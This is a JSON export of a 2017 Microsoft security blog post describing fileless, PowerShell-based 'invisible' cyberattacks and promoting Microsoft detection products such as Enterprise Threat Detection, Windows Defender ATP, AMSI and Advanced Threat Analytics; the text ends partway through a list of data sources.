{"id":68242,"date":"2017-05-10T09:00:36","date_gmt":"2017-05-10T16:00:36","guid":{"rendered":"http:\/\/blogs.microsoft.com\/microsoftsecure\/?p=68242"},"modified":"2023-05-15T23:11:49","modified_gmt":"2023-05-16T06:11:49","slug":"use-enterprise-threat-detection-to-find-invisible-cyberattacks","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2017\/05\/10\/use-enterprise-threat-detection-to-find-invisible-cyberattacks\/","title":{"rendered":"Use Enterprise Threat Detection to find \u201cinvisible\u201d cyberattacks"},"content":{"rendered":"

This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.<\/em><\/p>\n

Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have been published describing the more difficult to detect cyberattacks which leverage normal tools already present in an enterprise to achieve their mission. SecureList calls the techniques used in these situations \u201cinvisible” and “diskless\u201d<\/a>. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.<\/p>\n

To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:<\/p>\n

    \n
  1. Microsoft Enterprise Threat Detection<\/li>\n
  2. Windows Defender Advanced Threat Protection<\/li>\n
  3. Microsoft Advanced Threat Analytics<\/li>\n<\/ol>\n

    Here is a summary of why these can help you.<\/p>\n

    The Microsoft Enterprise Threat Detection<\/a> (ETD) service, is a managed detection service, able to detect invisible\/diskless attacks and provide enterprises with actionable intelligence to effectively respond to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection<\/a> (Windows Defender ATP). This feature along with Antimalware Scan Interface<\/a> (AMSI) and Microsoft Advanced Threat Analytics<\/a> (ATA) provide you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.<\/p>\n

    Enterprise Threat Detection can consume a variety of data sources:<\/p>\n